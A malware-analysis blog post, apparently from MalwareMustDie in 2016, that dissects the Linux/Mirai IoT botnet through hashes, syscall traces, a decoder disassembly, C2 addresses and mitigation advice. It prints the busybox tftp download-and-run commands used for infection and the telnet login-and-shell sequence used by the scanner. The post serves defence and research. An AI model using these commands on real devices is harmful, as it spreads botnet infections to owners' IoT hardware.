<div class='cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left'>
<div class='fauxborder-right'></div>
<div class='fauxcolumn-inner'>
</div>
</div>
<div class='cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
</div>
<div class='content'>
<div class='content-fauxcolumns'>
<div class='fauxcolumn-outer content-fauxcolumn-outer'>
<div class='cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left'>
<div class='fauxborder-right'></div>
<div class='fauxcolumn-inner'>
</div>
</div>
<div class='cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
</div>
<div class='content-outer'>
<div class='content-cap-top cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left content-fauxborder-left'>
<div class='fauxborder-right content-fauxborder-right'></div>
<div class='content-inner'>
<header>
<div class='header-outer'>
<div class='header-cap-top cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left header-fauxborder-left'>
<div class='fauxborder-right header-fauxborder-right'></div>
<div class='region-inner header-inner'>
<div class='header section' id='header'><div class='widget Header' data-version='1' id='Header1'>
<div id='header-inner'>
<a href='https://blog.malwaremustdie.org/' style='display: block'>
<img alt='Malware Must Die!' height='77px; ' id='Header1_headerimg' src='https://2.bp.blogspot.com/-rrlkZ50FDJA/UERTcxL8i3I/AAAAAAAAFY8/F5vmhcrbLs4/s1600/MMD.JPG' style='display: block' width='395px; '/>
</a>
<div class='descriptionwrapper'>
<p class='description'><span>The MalwareMustDie Blog (blog.malwaremustdie.org)</span></p>
</div>
</div>
</div></div>
</div>
</div>
<div class='header-cap-bottom cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
</header>
<div class='tabs-outer'>
<div class='tabs-cap-top cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left tabs-fauxborder-left'>
<div class='fauxborder-right tabs-fauxborder-right'></div>
<div class='region-inner tabs-inner'>
<div class='tabs no-items section' id='crosscol'></div>
<div class='tabs no-items section' id='crosscol-overflow'></div>
</div>
</div>
<div class='tabs-cap-bottom cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
<div class='main-outer'>
<div class='main-cap-top cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left main-fauxborder-left'>
<div class='fauxborder-right main-fauxborder-right'></div>
<div class='region-inner main-inner'>
<div class='columns fauxcolumns'>
<div class='fauxcolumn-outer fauxcolumn-center-outer'>
<div class='cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left'>
<div class='fauxborder-right'></div>
<div class='fauxcolumn-inner'>
</div>
</div>
<div class='cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
<div class='fauxcolumn-outer fauxcolumn-left-outer'>
<div class='cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left'>
<div class='fauxborder-right'></div>
<div class='fauxcolumn-inner'>
</div>
</div>
<div class='cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
<div class='fauxcolumn-outer fauxcolumn-right-outer'>
<div class='cap-top'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
<div class='fauxborder-left'>
<div class='fauxborder-right'></div>
<div class='fauxcolumn-inner'>
</div>
</div>
<div class='cap-bottom'>
<div class='cap-left'></div>
<div class='cap-right'></div>
</div>
</div>
<!-- corrects IE6 width calculation -->
<div class='columns-inner'>
<div class='column-center-outer'>
<div class='column-center-inner'>
<div class='main section' id='main'><div class='widget Blog' data-version='1' id='Blog1'>
<div class='blog-posts hfeed'>

          <div class="date-outer">
        
<h2 class='date-header'><span>Thursday, September 1, 2016</span></h2>

          <div class="date-posts">
        
<div class='post-outer'>
<div class='post hentry' itemscope='itemscope' itemtype='https://schema.org/BlogPosting'>
<a name='962351771858487603'></a>
<h3 class='post-title entry-title' itemprop='name'>
MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. 
</h3>
<div class='post-header'>
<div class='post-header-line-1'></div>
</div>
<div class='post-body entry-content' id='post-body-962351771858487603' itemprop='description articleBody'>
Our recent analysis about Mirai is in here==>[<a href="https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html">Link</a>]

<p><h2>Background</h2>

<p>From August 4th 2016 several sysadmin friends were helping us by uploading this malware files to our dropbox. The samples of this particular ELF malware ware not easy to retrieve, there are good ones and also some broken ones, I listed in this post for the good ones only. This threat is made by a new ELF trojan backdoor which is now in on-going stage aiming IoT, the name of the binary is <b>"mirai.*"</b> and is having telnet attack as main functionality to other boxes. 

<p>As I see these samples as something new, it would be good to start to write analysis for the purpose to raise awareness of this threat widely, since the attacks are actively spotted in the wild on plenty of infected IoT networks. During the checks I discussed about the threat to the engineer friends in ETLabs,[<a href="https://twitter.com/ET_Labs">links</a>] who also detecting the same attack phenomena, and then having dialogue with our supporters who reported this threat directly too. 

<p><b>ELF Linux/Mirai</b> <font color=red>is currently having a very low ELF/Linux antivirus detection ratio</font>, even in the architecture of x86. The detection in VT for the collected multiplatform samples can be viewed in the several links below:<br>
<b>Linux/Mirai</b> ITW samples: [<a href="https://www.virustotal.com/en/file/5bf5d7d6914b14c6b98ca747d3ce463e4289d6614beba72deccd59cd08c90ed3/analysis/">link</a>]  [<a href="https://www.virustotal.com/en/file/2238c81031ca78f4df121c94e1fca5368099b6003c30fef83768fef65ce09e9f/analysis/">link</a>]  [<a href="https://www.virustotal.com/en/file/62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6/analysis/">link</a>]  [<a href="https://www.virustotal.com/en/file/930486713426db5072600c504427ea37f108ee2cee7c7c289866164a83f3f356/analysis/">link</a>]  [<a href="https://www.virustotal.com/en/file/c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f/analysis/1472702235/">link</a>]  [<a href="https://www.virustotal.com/en/file/d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89/analysis/1472702414/">link</a>]  [<a href="https://www.virustotal.com/en/file/1bf953862e0ba56144f3469a7915d9e25737a7a75d4d8e64753c9e4ecac96cfc/analysis/1472702535/">link</a>]  [<a href="https://www.virustotal.com/en/file/65de6303edb13128c26b34b3d3f1a5b78f19302f0c3822b5f82573c045d96c78/analysis/1472702972/">link</a>]  [<a href="https://www.virustotal.com/en/file/ded9c77a46726c8dcebbbe0cf945b6c97e17728aa6ddc1d28dfad300371fa921/analysis/">link</a>]

<p>The reason for the lack of detection is because of the lack of samples, which are difficult to fetch from the infected IoT devices, routers, DVR or WebIP Camera, the Linux with Busybox binary in embedded platform, which what this threat is aiming. 

<p><h2>The threat information</h2>

<p>The binaries are collected from multiple direct/indirect sources:
<pre class="brush: asm">
mirai.arm:    ELF 32-bit LSB executable, 'ARM', version , statically linked, stripped
mirai.arm7:   ELF 32-bit LSB executable, 'ARM, EABI4' version 1 (SYSV), statically linked, stripped
mirai.mips:   ELF 32-bit MSB executable, 'MIPS, MIPS-I' version 1 (SYSV), statically linked, stripped
mirai.ppc:    ELF 32-bit MSB executable, 'PowerPC or cisco 4500', ver 1 (SYSV), statically linked, stripped
mirai.sh4:    ELF 32-bit LSB executable, 'Renesas SH', version 1 (SYSV), statically linked, stripped
mirai.sparc:  ELF 32-bit MSB executable, 'SPARC', version 1 (SYSV), statically linked, stripped
mirai.x86:    ELF 32-bit LSB executable, 'Intel 80386', version 1 (SYSV), statically linked, stripped
</pre>

<p>I picked up the <i>ELF binary</i> in <i>ARM architecture</i> for my main reversing since the it was the first ELF appeared, Doing the cross reference with the MIPS, PPC and Sparc ELF ones for the details. In this case, I use plenty of usual tools, nothing fancy or special.

<p>The hash of the Linux/Mirai initial binaries spotted:
<pre class="brush: asm">
MD5 ('mirai.arm')  = b98bc6ab2ed13028cd5178c422ec8dda
MD5 ('mirai.arm7') = 33987c397cefc41ce5e269ad9543af4c
MD5 ('mirai.mips') = 8e36a1fb6f6f718ec0b621a639437d8b
MD5 ('mirai.ppc')  = e08befb4d791e8b9218020292b2fecad
MD5 ('mirai.sh4')  = 030159a814a533f30a3e17fe757586e6
MD5 ('mirai.sparc')= ac61ba163bffc0ec94944bb7b7bb1fcc
MD5 ('mirai.x86')  = 6b7b6ee71c8338c030997d902a2fa593
</pre>Thank you to a friend who helped much.

<p>These binaries were infected to the compromised Linux system's <i>SSH </i>or <i>Telnet </i>account (via default password flaw on specific IoT aimed). Upon the shell access gained, the attacker will download the payload of this malware to the Linux device by command traced like below:
<pre class="brush: asm">
'busybox tftp' -r [MalwareFile] -g [IPsource]
'busybox tftp' -g -l 'dvrHelper' -r [MalwareFile] [IPsource]
</pre>
The source of infection (by current download & connection trace)
<pre class="brush: asm">
5.206.225.96 |  |49349 | 5.206.225.0/24 | DOTSI | PT | tuganet.pt | Dotsi Unipessoal Lda.
151.80.99.84 | ns395732.ip-151-80-99.eu. |16276 | 151.80.0.0/16 | OVH | FR | ovh.com | OVH SAS
</pre>

<p><h2>Execution processes</h2>

<p>In some cases of the Linux/Mirai infection is showing traces that the malware was executed without parameter and there are cases where the downloaded malware file(s) is deleted after execution. In this case mostly you won't get the samples unless you dump the malware process to the ELF binary. This explains it is hard to get the good working samples for this new threat.

<p>During the execution, the malware will open the <b>/etc/watchdog</b> file in read-write state with the command:
<pre class="brush: asm">
open("/dev/watchdog", O_RDWR)
</pre>Notes: In some newer cases the coder is adding other path of <b>watchdog</b> like:
<pre class="brush: asm">
/dev/misc/watchdog
</pre>
Moving forward, and then <b>Linux/Mirai</b> will change the work directory to the root directory:
<pre class="brush: asm">
chdir("/")</pre>
It uses  PF_INET socket it is opening UDP/53 port to access Google DNS server in 8.8.8.8 and established a connection. Something like the below reversed code (see the last section about skeleton reversing) is showing the following commands was executed for this part:<br>
<img src="https://lh3.googleusercontent.com/d1FGT8qEY4S6SABPZMtGv7j9kTEMwSOUW4mypPyP3Gom2jrfkyOteCFgva-RZhmoYnph77ISW3ZkFQ=w555-h130-no">

<pre class="brush: asm">
connect(3, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) </pre>
The malware will detect the outbound interface and by re-using previous used socket it opens a random TCP/port to the IP address. If the process above succeed malware will close the socket afterward
<pre class="brush: asm">
getsockname(3, {sa_family=AF_INET, sin_port=htons(39221), sin_addr=inet_addr("YOUR-IP")}, [16])
close(3)</pre>

<p>At this point the malware is performing several decoding for strings, which will be resulted in the targeted malware file name (below) and several random names.
<pre class="brush: asm">
0xbf96daa4  0000 0000 0000 0000 0000 0000 0000  ..............
0xbf96dab2  0000 2e2f 6476 7248 656c 7065 7200  ..'/dvrHelper'.
0xbf96dac0  0000 0000 0000 0000 0000 0000 0000  ..............</pre>
The file will be the copy of the malware under <b><i>/dev/.{Something}/dvrHelper</i></b>  with piping the <i>stdout </i>and <i>stderr </i>on execution made to <i>/dev/null</i> (for silent mode execution).

<p>The <i>/etc/watchdog</i> execution is meant for making the delay, for the malware not to perform the bad function instantly to avoid the early detection, and it just sit there and make sure the malicious opened backdoor port is up and used. The mentioned <i>{Something}</i> is the keyword generated by the malware, in example path: <i>/dev/.anime/drvHelper</i> 

<p>Upon execution the malware will be self-deleted to avoid the trace, but the process is running. In some IoT that can be seen in lsof or the list to the /proc with specific PID, i.e.:
<pre class="brush: asm">
/proc/{PID}/exe -> '/dev/.{something}/dvrHelper' (deleted) 
/proc/{PID}/exe -> './{long alphabet strings}' (deleted) </pre>

<p>In this stage, the networking process continues, the malware is opening PF_INET socket for TCP, and bind it to the specific port (not random) <b>TCP/48101</b> from <b>localhost IP address 127.0.0.1</b> and then starting to listen to the incoming connection: 
<pre class="brush: asm">
socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
bind(3, {sa_family=AF_INET, sin_port='htons(48101'), sin_addr=inet_addr("127.0.0.1")}, 16)
listen(3, 1) </pre>

<p>By this stage the system-wide realtime clock will be queried (triggered by random) along with the retrieval set of PID, following by start forking, noted the following clocktest output and the stdout of "NULL\n"
<pre class="brush: asm">
clock_gettime(CLOCK_REALTIME, {1472261021, 649262704}. 
getpid() // // see the reverse engineering part...
getppid()
clock_gettime(0x2 /* CLOCK_??? */, {0, 6215000})
prctl(PR_SET_NAME, 0xbef89752, 0xbef897b8, 0xbef897c8, 0)
write(1, NULL, 0)
write(1, "\n", 1)
fork()</pre>
Notes:
<pre>
<i>- forking always starts if infection possible.
- The "NULL\n" is for the execution trace of the watchdog via execl(parse to environment in execve).</i>
</pre>
Then this main process will exit here. and forked to new process PID (note: If you go this far means the malware can infect your system).

<p>For some infection case the malware is self connected to its opened <b>TCP/48101</b> & will continuously looping without making any forks, in this case you won't get infection:
<pre class="brush: asm"> 
connect(4, {sa_family=AF_INET, sin_port=htons(48101), sin_addr=inet_addr("0.0.0.0")}, 16}
</pre>
List of files will show. it's showing the access port for the nodes. 
<pre class="brush: asm">
 IPv4 5629  0t0  TCP 127.0.0.1:'48101 (LISTEN)'
 IPv4 5670  0t0  TCP 127.0.0.1:60254->'127.0.0.1:48101 (ESTABLISHED)'
</pre>

<p>In the forked process, upon the attack command can be triggered, the infected device will perform connection on telnet services on other device for the abuse purpose:
<pre class="brush: asm">
socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
connect(6, {sa_family=AF_INET, sin_port=htons(23), sin_addr=inet_addr("x.x.x.x")}, 16)
sendto(7, "\377\374\1", 3, MSG_NOSIGNAL, NULL, 0)
sendto(7, "\377\374!", 3, MSG_NOSIGNAL, NULL, 0) 
sendto(7, "\377\375\1", 3, MSG_NOSIGNAL, NULL, 0)
sendto(7, "\377\375\3", 3, MSG_NOSIGNAL, NULL, 0)
recvfrom(0, "E\0\0(\276~@\0001\6t\342\305\347\335\323\300\250\262\vo0\0\26\373\334\316\244\217\3425\214".
recvfrom(0, "E\0\0004>J@\0*\6\fbj\375(g\300\250\262\v\0\27\243\375P\351\2211m\4\322o"..
recvfrom(0, "E\0\0(\276\177@\0001\6t\341\305\347\335\323\300\250\262\vo0\0\26\373\334\316\244\217\3425\344"..
recvfrom(0, "E\0\0(\276\200@\0001\6t\340\305\347\335\323\300\250\262\vo0\0\26\373\334\316\244\217\3426,"..
recvfrom(0, "E\0\0,\0\0@\0.\6\216=I\213\2P\300\250\262\v\0\27\311gH\31\23\320I\213\2Q".
</pre>
And doing the backdoor to connect via HTTP on <b>65.222.202.53</b>.
<pre class="brush: asm">connect(0, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("65.222.202.53")}, 16)</pre>

<p><h2>Mitigation method of Linux/Mirai infection</h2>

<p><b>Picking a right ELF is important..
</b><p>You'll find so little indicator and some encoded strings in the ARM binary. But there is no problem. First you should pick the clean ELF, it has the characteristic like the below:
<pre class="brush: asm">
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 61 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            ARM
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           ARM

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD           0x000000 0x00008000 0x00008000 0x0dbb4 0x0dbb4 R E 0x8000
  LOAD           0x00e004 0x0001e004 0x0001e004 0x001d4 0x05a84 RW  0x8000
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4

Section to Segment mapping:
  Segment Sections...
   00     .init .text .fini .rodata
   01     .ctors .dtors .data .bss
</pre>That's it for the available header & sections reading.

<p>From each of Linux.Mirai ELF file clean state like above, it has significant strings that can be filtered by signatures:
<pre class="brush: asm">
/dev/watchdog
'LCOGQGPTGP'
/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
enter
ogin
assword
/dev/null
</pre>If you are in the Linux box, non DVR or busybox IoT type, secure the access to the below stated directory too..if came up from any unknown executables. It is also a good hazard to kill the chain of infection:<br>
<a href="https://lh3.googleusercontent.com/XsvgjT33vTXRf4zhs6xfQCxodHpNRToNN9Qzy2NsgTtR3FT-HQ8EDfF8os-iBnBlULT4bAhPLSTBPQ=w1313-h292-no"><img src="https://lh3.googleusercontent.com/XsvgjT33vTXRf4zhs6xfQCxodHpNRToNN9Qzy2NsgTtR3FT-HQ8EDfF8os-iBnBlULT4bAhPLSTBPQ=w580-h200-no"></a>

<p>In rare occasion for infection of <b>Linux/Mirai</b> will connect you back to this MUD game site, blocking its IP is good for protection:<br>
<a href="https://lh3.googleusercontent.com/pjNCHUX-G4stRs5Ir-8EO3uHTnhXK39j7AJYLohrICtEYwP71wcF54NlkfTPW5kOEM24-WGSIEVxeQ=w747-h763-no"><img src="https://lh3.googleusercontent.com/pjNCHUX-G4stRs5Ir-8EO3uHTnhXK39j7AJYLohrICtEYwP71wcF54NlkfTPW5kOEM24-WGSIEVxeQ=w580-h580-no"></a>

<br>&#8593;The site is showing the asciiart Mirai logo. &#8595;Anybody's home??
<img src="https://lh3.googleusercontent.com/pMtYB9eGiF3udaNRFivNmcW2DNjGhS9j1gj2ZRtrg-aVgPhIA9qI3piE7o5jxa6pV3Znzr3x5cSd4Q=w500-h100-no">
<br>This MUD-like interface is later on known as Mirai botnet CNC CLI panel, thank's "Richard":<br>
<a href="https://lh3.googleusercontent.com/E8PiGANXvZ5Uzd5PIhvkuuR46Xk-1hXZwW_fIM7whrMtj4km8sihETXmnm0Az05hV7K5EMCk71VyJw=w863-h864-no"><img src="https://lh3.googleusercontent.com/E8PiGANXvZ5Uzd5PIhvkuuR46Xk-1hXZwW_fIM7whrMtj4km8sihETXmnm0Az05hV7K5EMCk71VyJw=w560-h864-no"></a>
<br>
<a href="https://lh3.googleusercontent.com/HibNgny8MufkPvGXIcDpklsK3exZsP21YCmvliAdCYX1rZrTIUaj0AUT7VPGncKJXESjoSOMAG6COg=w1288-h809-no"><img src="https://lh3.googleusercontent.com/HibNgny8MufkPvGXIcDpklsK3exZsP21YCmvliAdCYX1rZrTIUaj0AUT7VPGncKJXESjoSOMAG6COg=w580-h809-no"></a>

<p>Blocking the used TCP/48101 port if you don't use it, it's good to prevent infection & further damage:
<pre class="brush: asm">
mirai 29557 toor 3u  IPv4  386807  0t0  "TCP 127.0.0.1:48101 (LISTEN)"
mirai 29557 toor 4u  IPv4  504795  0t0  "TCP 127.0.0.1:44424->127.0.0.1:48101 (ESTABLISHED)"
</pre>

<p>The other method is to secure your busybox execution to be run only on specific user. You'll need shell access for this operation, along with other hardening methods. The most important thing to prevent the infection is: if you have an IoT device, <b><i>please make sure you have no telnet service open and running</i></b>.

<p><h2>Botnet protocol used for infection via Telnet service</h2>

<p><i>This explanation exists because of there are two good persons are supporting effort to crack it: Special thank's to Waldo Kitty & @node5.</i>

<p>What I am explaining here is the telnet scanner function that is used by attacker using the Linux/Mirai client version to get the installation of this malware in other node with accessible telnetd.

<p>During the telnet session, Linux/Mirai attacker will communicate with its target with specific protocol. Please see the illustration below for getting the idea of what will be explained in the next writing:<br>
<a href="https://lh3.googleusercontent.com/8oNGUlnUckhyby7Jlvb2yoSXpeE1kwwGEPuKIsyYpJ61u8cDuF8nObntcbkvP-jKEVpOgD-YB4K3XQ=w1600-h768-no"><img src="https://lh3.googleusercontent.com/8oNGUlnUckhyby7Jlvb2yoSXpeE1kwwGEPuKIsyYpJ61u8cDuF8nObntcbkvP-jKEVpOgD-YB4K3XQ=w444-h444"></a>
<br>The Username and Passwords mentioned in the figure are used for login bruting, and is hardcoded in the binary of Linux/Mirai, along with the commands used for the gaining the shell. 
<p>The botnet will communicate to the remote access (assuming server) who request the same strings sent, with the "report" in CNC callback, with the specific keyword.

<br>After gaining shell access, the malware sends the shell one-liner command to install malware with the format as below:<br>
<a href="https://lh3.googleusercontent.com/uDe6Gy5F20GPiVX8PRFbGJ90n1jlN8iuZnN5uLHQcDZ5jM1XzJbO4vKyvKZDK8m5mPenHQcKN9wQrA=w969-h153-no"><img src="https://lh3.googleusercontent.com/uDe6Gy5F20GPiVX8PRFbGJ90n1jlN8iuZnN5uLHQcDZ5jM1XzJbO4vKyvKZDK8m5mPenHQcKN9wQrA=w444-h444-no"></a><br>
This command is also hardcoded. It explained why we can not find the samples in the current infected systems since the malware file downloaded will be deleted after the execution.

<p>The possible sequence of the attack commands can be shown as below variations:
<pre class="brush: asm">
{Username}
{Passwords}
shell
enable
sh
/bin/busybox MIRAI</pre>

or, the combination below:
<pre class="brush: asm">
{Username}
{Passwords}
enable
system
shell
sh
bin/busybox MIRAI</pre>
<p>
The reversing snips for this infection protocol can be read in <b>skeleton reversing section</b>.

<p><h2>Reversing Linux/Mirai (stripped ARM) in binary (raw) way</h2>

<p>The binary is reversible, but it's a bit "heavily stripped" and has double function for decoders, so it is not that easy to read, but it's fine. You'll see some important "artifacts" like these "case-switch" they coded to perform attack:<br>
<a href="https://lh3.googleusercontent.com/HZxzLUzeN7DB460HgWyn9Dp8hdb2jKYVV6PnckpRUGVyPDX3PpLLNWK7dO4cmdBlbhKzCqdCD9SI_w=w1186-h492-no"><img src="https://lh3.googleusercontent.com/HZxzLUzeN7DB460HgWyn9Dp8hdb2jKYVV6PnckpRUGVyPDX3PpLLNWK7dO4cmdBlbhKzCqdCD9SI_w=w580-h280-no"></a>

<p>If you trace it carefully all of origin for strings used in encoded binary can be read like this:<br>
<a href="https://lh3.googleusercontent.com/4jCl0n9mmpsqce_4lRw4cDw7OMxNNSKqleAbv5MWQFnCpjU7XjmD37cPYoaQGhGxBroaImPCmVNewQ=w1846-h863-no"><img src="https://lh3.googleusercontent.com/4jCl0n9mmpsqce_4lRw4cDw7OMxNNSKqleAbv5MWQFnCpjU7XjmD37cPYoaQGhGxBroaImPCmVNewQ=w580-h300-no"></a>

<p>Decoder
<pre class="brush: asm">
// just to get the idea...what is cracked..

  fn.0x0000f9e8(var3,  (int)"\rRPMA\r\"", 7);
  fn.0x0000f9e8(var4,  (int)"\rGZG\"", 5);
  fn.0x0000f9e8(var7,  (int)"jvvrdnmmf\"", 10);
  fn.0x0000f9e8(var8,  (int)"nmnlmevdm\"", 10);
  fn.0x0000f9e8(var10, (int)"XMNNCPF\"", 8);
  fn.0x0000f9e8(var11, (int)"egvnmacnkr\"", 11);
  fn.0x0000f9e8(var14, (int)"QJGNN\"", 6);
  fn.0x0000f9e8(var15, (int)"GLC@NG\"", 7);
  fn.0x0000f9e8(var16, (int)"Q[QVGO\"", 7);
       :
  fn.0x0000f9e8(var17, (int)"QJ\"", 3);
  fn.0x0000f9e8(var20, (int)"LAMPPGAV\"", 9);

// One decoder in fn.0x0000f9e8

|           0x0000f9e8      000052e3       cmp r2, 0
|           0x0000f9ec      0ef0a001       moveq pc, lr
|           0x0000f9f0      00c0a0e3       mov ip, 0
|           ; JMP XREF from 0x0000fa04 (fcn.0000f9e8)
|       .-> 0x0000f9f4      0130d1e4       ldrb r3, [r1], 1
|       |   0x0000f9f8      0030cce7       strb r3, [ip, r0]
|       |   0x0000f9fc      01c08ce2       add ip, ip, 1
|       |   0x0000fa00      02005ce1       cmp ip, r2
|       `=< 0x0000fa04      faffff1a       bne 0xf9f4
\           0x0000fa08      0ef0a0e1       mov pc, lr
</pre>

<p>So the usual reversing method can be done to this ELF malware with using any of your flavor reversing tool that can support ELF reading in little endian. (Well, by know you all know what our chosen reversing tool is). I will not say much about this, since all of the previous posts are showing much of this method, but let me explain a new method with the details in the next section.

<p><h2>Reversing Linux/Mirai (stripped ARM) on "skeleton" tool</h2>

<p>I've been working with my personal project called <i><b>skeleton</b></i> for some time, it was started since the <i>ELF Workshop of MalwareMustDie</i> started in here, Tokyo, Japan during AVTokyo conference last year. With the goal to be an <i>open source</i> project (currently still in private for some hiccups core development). The tool is having all practical necessity I need during analyzing a new unknown ELF malware, to save my time a lot to focus on the core of codes and source of the threat. 

<p>For the RCE itself, <i>Skeleton</i> can be used to form the ELF binary into as close as possible to the original state. If a known binary is analyzed by "skeleton", it's not interesting and that's not the point of this tool. Skeleton is showing its advantages when you push the unknown ELF into it, so this ARM binary is a good chance to test it :-).

<p>Firstly, the simple explanation of "skeleton" concept can be seen in the figure below, a self-explanatory:
<br>
<a href="https://lh3.googleusercontent.com/uluYPQGojhT61S-roKKIt6r0s1flDkAVRNxu-T7LWTvSPGARyc1Mc2VnUrQvOGWBbAIdfuifV7XWWg=w1421-h783-no"><img src="https://lh3.googleusercontent.com/uluYPQGojhT61S-roKKIt6r0s1flDkAVRNxu-T7LWTvSPGARyc1Mc2VnUrQvOGWBbAIdfuifV7XWWg=w580-h580-no"></a>

<p>Skeleton concept is analyzing the all malware libraries you collected (all vectors related information of one family of malware) in the database, and is checking the new analyzed binary by firstly checking calls made on the sample..just like when you trace a syscalls..but with additional of the <i>known function</i> too are stored in malcode dataset. For example, in this Linux/Mirai this is the statistic of used syscall (this is only the example, using a very well known command):<br>
<a href="https://lh3.googleusercontent.com/ZpYlPTGhEm8jyu8Mp1KLwBXHIEo3adaUFhne7AubVq4sBolI6M2IKU3_SJ8bRGZrkLGkz9SrLF5org=w864-h511-no"><img src="https://lh3.googleusercontent.com/ZpYlPTGhEm8jyu8Mp1KLwBXHIEo3adaUFhne7AubVq4sBolI6M2IKU3_SJ8bRGZrkLGkz9SrLF5org=w555-h555-no"></a>

<p>Then the tool is parsed by radare2 assembly dump of the malware, in the form like in the below picture's shown:<br>
<a href="https://lh3.googleusercontent.com/4k_LqQTA_2iLVeJofEEL-S6QeVDq0XqLakLfG2FaBjzyIsOa2ggdYLM9j9vVGos8kPoHko0lgmh3Nw=w699-h953-no"><img src="https://lh3.googleusercontent.com/4k_LqQTA_2iLVeJofEEL-S6QeVDq0XqLakLfG2FaBjzyIsOa2ggdYLM9j9vVGos8kPoHko0lgmh3Nw=w444-h444-no"></a>

<br>..and after some process (sorry that I can not say openly here), receiving a not-bad reversing output in the C-like (NOT C++). The result is not 100% looks like the original source code. Specially if you are reversing this from ARM processor which many variable declaration will be passed more steps through registers than Intel, but it will get you into an idea of what kind of code that's actually responsible for this badness. The code generated by this scheme is making a basic concept code of what the actual source code is, why I called it as "skeleton". 

<br><i>PS: Radare is the best tool for RCE in this planet, me and MMD team are proud to use it for so long.</i>

<p>..And I was not surprised when I saw that <b>ELF Linux/Mirai</b> was actually showing many part of codes as similar as GayFgt/Torlus/Lizkebab or Bash0day/Bashdoor/BashLite.<br>
Reference about GayFgt/Torlus/Lizkebab [<a href="http://blog.malwaremustdie.org/2016/02/mmd-0052-2016-skidddos-elf-distribution.html#gayfgt">link</a>] 

<p>Below are screenshots of view of <i>skeleton RCE tool</i> results (after being <i>beautified</i>) by analyzing Linux/Mirai malware:

<p>The cracked functions:
<br>
<a href="https://lh3.googleusercontent.com/_QsVmLthlL6NzD0dE3KLCpJCjjJQOKtUIt_omzqnrjTpgE4MZO7mz03cZ7pWny2G19Lc0ELaAVCJKA=w643-h545-no"><img src="https://lh3.googleusercontent.com/_QsVmLthlL6NzD0dE3KLCpJCjjJQOKtUIt_omzqnrjTpgE4MZO7mz03cZ7pWny2G19Lc0ELaAVCJKA=w333-h333-no"></a>

<p>Putting all together in the main()  :)
<br>
<a href="https://lh3.googleusercontent.com/sFbvBPO5FBoKBTe-YgkNNss-NWm_6CC4RjvQqyS67DRtpK_PVfnMw1-_Jm0dpEgsRXNk7EvhNDdODg=w1186-h880-no"><img src="https://lh3.googleusercontent.com/sFbvBPO5FBoKBTe-YgkNNss-NWm_6CC4RjvQqyS67DRtpK_PVfnMw1-_Jm0dpEgsRXNk7EvhNDdODg=w555-h555-no"></a>

<p>The case-switch used for abuse action (attack, etc) trigger, looks like the coding style of Torlus/GayFgt re-coded version to me..
<br>
<a href="https://lh3.googleusercontent.com/uSQOQ_JcUy9-46al4bZFwU7BUiwqosP-dJgpnzmjyYPTsZpYmQxDP_lJKdhWPd7b8lavnrelOrYj-w=w987-h894-no"><img src="https://lh3.googleusercontent.com/uSQOQ_JcUy9-46al4bZFwU7BUiwqosP-dJgpnzmjyYPTsZpYmQxDP_lJKdhWPd7b8lavnrelOrYj-w=w555-h555-no"></a>

<p>Obviously same style of coding too :-) Some strings are automatic input by skeleton as suggestion since the system found the code matched. 
<br>
<a href="https://lh3.googleusercontent.com/lku57I2mepTA8MI4gDwpBUp-wAaA0tyuM-5TuDKHowYm0MgW3ySYOCZvvcjceUfdZWWeqwj6li9vJA=w824-h904-no"><img src="https://lh3.googleusercontent.com/lku57I2mepTA8MI4gDwpBUp-wAaA0tyuM-5TuDKHowYm0MgW3ySYOCZvvcjceUfdZWWeqwj6li9vJA=w555-h555-no"></a>

<p>Another encoded strings blob and path to its decoder addresses:<br>
<img src="https://lh3.googleusercontent.com/eArvOZzZf_Rn2Gt2HJW-azT3ZmS8mra6CF8EMnzjJBJBFH76pEBEJBzpTG3SR0yH3BW0E-VALGDRpQ=w400-h400-no">

<p><b>Snips of "Skeleton" reversing on the malware's <b>Telnet Scanning Protocol</b></b>

<p><i>This part can not be done well w/o cool help from WaldoKitty. Not every information will be published, it is posted in enough level to PoC the threat and its origin.</i>
<p>The telnet login command "grepped" by the Linux/Mirai from skeleton C code:<br>
